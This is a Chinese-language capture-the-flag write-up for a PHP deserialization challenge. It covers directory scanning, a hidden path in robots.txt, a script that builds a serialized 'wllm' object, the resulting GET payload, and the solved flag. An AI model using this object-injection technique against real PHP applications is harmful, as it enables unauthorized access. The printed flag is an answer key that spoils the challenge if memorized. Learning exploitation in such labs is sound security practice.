打开链接但是没有题目

 使用御剑扫一下

flag.php打不开，但是在robots.txt里面我们找到了一个路径 /cl45s.php

 打开之后是PHP源码

简单审一下,构造pop链：

链尾（就是最终我们想要利用的地方），在echo $flag 并且include了flag.php

往上看，发现只需要满足  ($this->admin === "admin" && $this->passwd === "ctf")

即admin="admin"，passwd="ctf"

再往上看，发现执行这条语句我们需要触发__destruct()函数

__destruct是析构函数，会在对象的所有引用被删除或者当对象被显式销毁时自动执行，比如new完一个对象，当创建完成之后就不引用了，如果有赋值指向就会立马丢弃，触发destruct函数。

这里还有一个__construct()构造函数，它是在实例化一个对象（即new时）会自动调用。

上脚本：

<?php
class wllm{
    public $admin;
    public $passwd;
    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}
   
$w=new wllm();
$w->admin="admin";
$w->passwd="ctf";
$w=serialize($w);
echo $w;

关于脚本的解释：

我们将题目给的类放进去

后面先实例化这个类，此时会触发__construct()函数，并进行如下变量的赋值：

$admin ="user"

%passwd = "123456"

但是不影响，我们再给它们进行一次赋值，赋值成符合下面if语句判断的值

$w->admin="admin";
$w->passwd="ctf";

（这里的w就是实例化后的类wllm，->是调用的意思，调用wllm类里面的这两个变量进行赋值）

 我们说过new结束后，会触发__destruct()函数，此时来到if语句的判断，我们通过上面的赋值操作，让if语句判断为真，就会输出flag。

我们再将最终的$w用serialize函数进行序列化，并将结果输出：

得到 O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";} 

题目中提示要以get方式给p传参，并且会对传入参数进行反序列化操作

因此我们将序列化后的内容传给p即可

构造payload：

?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

传入后直接回显flag

NSSCTF{7c700eec-a6b7-4c9e-87b0-c36876cfbd14}